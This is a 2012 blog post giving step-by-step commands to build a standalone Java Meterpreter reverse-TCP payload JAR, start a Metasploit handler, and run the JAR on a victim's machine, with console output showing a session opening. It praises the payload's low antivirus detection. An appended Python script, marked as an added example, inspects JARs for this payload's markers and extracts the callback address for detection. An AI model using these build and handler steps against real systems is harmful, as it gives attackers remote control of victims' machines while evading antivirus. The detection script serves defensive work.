Wednesday, 21 March 2012

Standalone Java Meterpreter

The documentation out there on the web is somewhat out of date when it comes to compiling and executing a standalone Java Meterpreter payload, and as it's yet to become part of the core features of the Metasploit framework, I expect these steps to change again in the future. In the past you could use loader.jar to run the payload, but this is no longer included in the tree; instead, compile your own using Payload.java (which is included in the tree):

Create the Meterpreter JAR:
cd ./external/source/javapayload/src/
javac -source 1.4 -target 1.4 metasploit/Payload.java
echo -e "LHOST=10.0.0.1\nLPORT=82" > metasploit.dat
jar cfe payload.jar metasploit.Payload metasploit/Payload.class metasploit.dat

Now set up a handler in the Metasploit console to listen for the incoming connection:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(handler) > set LPORT 82
LPORT => 82
msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.0.1:82
[*] Starting the payload handler...

Launch the payload on the victim's machine:
java -jar payload.jar

Wait for the results:
[*] Sending stage (28541 bytes) to 192.168.0.1
[*] Meterpreter session 1 opened (10.0.0.1:82 -> 192.168.0.1:54562) at 2012-03-21 09:53:20 +0000

Pros:
  • AV detection is very low
  • Most boxes have Java installed
  • It works
Cons:
  • Only a limited set of post-exploitation modules can be run
  • Not as functional as a shellcode Meterpreter session.
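As an added example (not code from the original post), a small defender-side inspector that flags a JAR built with the layout above: a metasploit/Payload.class entry, a Main-Class of metasploit.Payload in the manifest, and a metasploit.dat holding LHOST/LPORT lines, from which it extracts the callback endpoint for blocking or hunting. The function names and the in-memory sample JAR (dummy class bytes, the post's 10.0.0.1:82 values) are constructed here for the demonstration.

```python
import io
import zipfile

PAYLOAD_CLASS = "metasploit/Payload.class"
CONFIG_ENTRY = "metasploit.dat"

def parse_dat(text):
    """Parse the KEY=VALUE lines of metasploit.dat into a dict."""
    config = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            config[key.strip()] = value.strip()
    return config

def inspect_jar(jar_bytes):
    """Report the Meterpreter markers found in a JAR (bytes); None if not a ZIP."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(jar_bytes))
    except zipfile.BadZipFile:
        return None
    names = set(zf.namelist())
    findings = {"main_class": None, "lhost": None, "lport": None,
                "has_payload_class": PAYLOAD_CLASS in names,
                "has_config": CONFIG_ENTRY in names}
    # `jar cfe` records the entry point as Main-Class in the manifest.
    if "META-INF/MANIFEST.MF" in names:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        for line in manifest.splitlines():
            if line.startswith("Main-Class:"):
                findings["main_class"] = line.split(":", 1)[1].strip()
    if findings["has_config"]:
        cfg = parse_dat(zf.read(CONFIG_ENTRY).decode("utf-8", "replace"))
        findings["lhost"] = cfg.get("LHOST")
        port = cfg.get("LPORT", "")
        findings["lport"] = int(port) if port.isdigit() else None
    # Both the loader class and its config resource present is the signature of this build.
    findings["suspicious"] = findings["has_payload_class"] and findings["has_config"]
    return findings

def build_sample_jar():
    """Constructed stand-in JAR with the post's layout (class bytes are a dummy)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: metasploit.Payload\n\n")
        zf.writestr(PAYLOAD_CLASS, b"\xca\xfe\xba\xbe")  # constructed placeholder, not a real class
        zf.writestr(CONFIG_ENTRY, "LHOST=10.0.0.1\nLPORT=82\n")
    return buf.getvalue()
```

Running inspect_jar(build_sample_jar()) reports suspicious=True with lhost 10.0.0.1 and lport 82; on a real sample, the same check can be run over any JAR found on disk or in mail attachments.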